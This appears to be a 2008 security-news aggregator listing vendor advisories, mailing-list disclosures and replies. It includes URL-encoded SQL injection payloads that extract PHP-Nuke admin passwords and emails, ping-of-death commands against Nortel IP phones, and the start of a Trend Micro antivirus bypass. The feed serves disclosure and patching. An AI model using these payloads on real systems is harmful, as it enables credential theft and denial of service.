[ MDVSA-2008:051 ] - Updated cups packages fix vulnerabilities

 ( 633 days 8 hours ago)

Mandriva Linux Security Advisory MDVSA-2008:051 Package : cups Date : February 26, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0 Problem Description: A flaw was found in how CUPS handled the addition and removal of ...

[ GLSA 200802-11 ] Asterisk: Multiple vulnerabilities

 ( 633 days 8 hours ago)

- Gentoo Linux Security Advisory GLSA 200802-11 - - Severity: High Title: Asterisk: Multiple vulnerabilities Date: February 26, 2008 Bugs: #185713 ID: 200802-11 - Synopsis Multiple vulnerabilities have been found in Asterisk. Background ...

[ GLSA 200802-12 ] xine-lib: User-assisted execution of arbitrary code

 ( 633 days 8 hours ago)

- - Gentoo Linux Security Advisory GLSA 200802-12 - - - - Severity: Normal Title: xine-lib: User-assisted execution of arbitrary code Date: February 26, 2008 Bugs: #209106, #208100 ID: 200802-12 - - Synopsis xine-lib is vulnerable to multiple buffer overflows when processing ...

[ MDVSA-2008:050 ] - Updated cups packages fix multiple vulnerabilities

 ( 633 days 8 hours ago)

Mandriva Linux Security Advisory MDVSA-2008:050 Package : cups Date : February 26, 2008 Affected: Corporate 3.0 Problem Description: Dave Camp at Critical Path Software discovered a buffer overflow in CUPS 1.1.23 and earlier could allow local admin users to execute ...

Re: Re: Nortel IP Phone DoS

 ( 633 days 8 hours ago)

ping -l 65500 I typo'd the command. We did also have one phone that seemed immune to it, but we tested several others and got the 'Server Unreachable' message. We use Cisco gear and I would assume the default MTU's are used. Thanks, sipher

Re: Nortel IP Phone DoS

 ( 633 days 8 hours ago)

Could you provide more details please. I've just tested it on Nortel IP Phone 2004 firmware 0604DAD and it doesn't work. What is the maximum MTU size on you network? How fragmentation of that ping happening?

SandMan 1.0.080226 is out!

 ( 633 days 8 hours ago)

Hi everybody! What is SandMan? - SandMan is a framework providing a C library and a python portage to make readable and writable the Windows hibernation file. - SandMan is released under GPLv3 licence. - Actually, Only 32bits version of the hibernation file from Windows ...

Bypassing OfficeScan Trend Micro AV

 ( 633 days 8 hours ago)

Hi, As usual, i dont know if its new but i would like to share it with you.... its possible to bypass TREND MICRO OFFICE SCAN Client AV ver. 8.0. If you edit a PE EXE File and increase its virtual and raw size, (in ...

[SECURITY] [DSA 1509-1] New koffice packages fix multiple vulnerabilities

 ( 633 days 8 hours ago)

- Debian Security Advisory DSA-1509-1 securityatdebian.org Noah Meyerhans February 25, 2008 - Package : koffice Vulnerability : several Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-4352 CVE-2007-5392 CVE-2007-5393 Debian Bug : 450631 Several vulnerabilities have been discovered in xpdf code that is ...

php-nuke sql injection reportaj [secid]

 ( 633 days 8 hours ago)

PHP-Nuke (reportaj) SQL Injection Vulnerability [secid] #modules.php?name=roportaj&op=listarticles&secid= pwd = -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnukeauthors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A user= -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnukeauthors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A email= -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cemail%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnukeauthors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Nortel IP Phone DoS

 ( 633 days 8 hours ago)

Nortel IP phone DoS Discovered: 2008-02-25 Tested on firmware: 0604DAS (Latest firmwares have also been tested.) Welcome the return of the Ping of Death! wait a minute...isn't this 2008? Steps to reproduce: 1. ping -s 65500 < ip of the phone > ...

'Cold Boot' encryption hack unlikely, says Microsoft

 ( 633 days 11 hours ago)

A Microsoft product manager is downplaying the "Cold Boot" threat posed by attackers trying to snag data off computer memory and said there are steps Vista users can take to ward off such threats.

Debian: New koffice packages fix multiple vulnerabilities

 ( 633 days 18 hours ago)

LinuxSecurity.com: Several vulnerabilities have been discovered in xpdf code that is embedded in koffice, an integrated office suite for KDE. These flaws could allow an attacker to execute arbitrary code by inducing the user to import a specially crafted PDF document.

Debian: New diatheke packages fix arbirary shell command execution

 ( 633 days 18 hours ago)

LinuxSecurity.com: Dan Dennison discovered that Diatheke, a CGI program to make a bible website, performs insufficient sanitising of a parameter, allowing a remote attacker to execute arbitrary shell commands as the web server user.